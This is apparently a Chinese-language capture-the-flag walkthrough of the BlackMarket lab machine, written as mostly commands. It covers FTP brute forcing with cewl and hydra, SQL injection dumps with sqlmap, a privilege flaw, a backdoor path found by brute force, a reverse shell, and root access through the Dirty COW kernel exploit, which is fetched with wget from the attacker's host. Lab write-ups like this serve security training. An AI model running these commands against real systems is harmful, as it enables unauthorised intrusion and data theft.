目录扫描
指纹识别
访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
对数据进行base64解密
Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone
利用cewl爬取网站生成关联词字典,然后使用hydra爆破21端口
cewl Operation Treadstone | The Bourne Directory | Fandom -d 1 -w BlackMarket_dic.txt
hydra -L BlackMarket_dic.txt -P BlackMarket_dic.txt ftp://192.168.1.2 -vV
得到账号密码nicky:CIA
拿到账号密码进行ftp登录
cd ftp/ImpFiles
more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
接着回到web端口
尝试弱口令---破解出账号密码supplier:supplier
拼接admin
修改订单时抓取数据包sqlmap测试漏洞
数据库爆破
sqlmap -r 1.txt --dbs --batch
sqlmap -r 1.txt -D BlackMarket --tables --batch
sqlmap -r 1.txt -D BlackMarket -T flag --dump --batch
发现flag3 Find Jason Bourne Email access
添加用户越权漏洞发现flag4
添加一个用户
抓取修改数据包
发现flag4{bm90aGluZyBpcyBoZXJl}
名字为Jbourne,密码为?????
登陆之前扫出的目录/squirrelmail
发现flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
quipqiup - cryptoquip and cryptogram solver
拼接/kgbbackdoor
1.sql数据库中有一个eworkshop的数据库
利用crunch生成字典进行爆破。
crunch 9 9-t @workshop > BlackMarket_BackdoorPath.txt
2.使用dirb进行爆破->有个路径
dirb http://192.168.1.4/home/kali/BlackMarket_BackdoorPath.txt
拼接/vworkshop
,拼接之前的到的提示/kgbbackdoor/PassPass.jpg
下载本地用010Editor工具分析
发现pass
Pass = 5215565757312090656
十进制:5215565757312090656
十六进制:4861696c4b474400
ASCii: HailKGB
得到密码为:HailKGB
访问后门http://192.168.1.2/vworkshop/kgbbackdoor/backdoor.php
输入得到的密码得到flag6{Um9vdCB0aW1l}
点击network尝试反弹shell
kali开启监听
成功反弹shell
# 获取交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
查询系统版本
uname -a 版本为4.4.0
使用脏牛提权
searchsploit dirty
searchsploit -m linux/local/40616.c # 将exp复制到kali
python -m http.server 8001 # 开启临时服务
cd /tmp
wget http://192.168.1.4:8000/40616.c
gcc 40616.c -o cowroot -pthread # 编译.c文件
ls -al
提权成功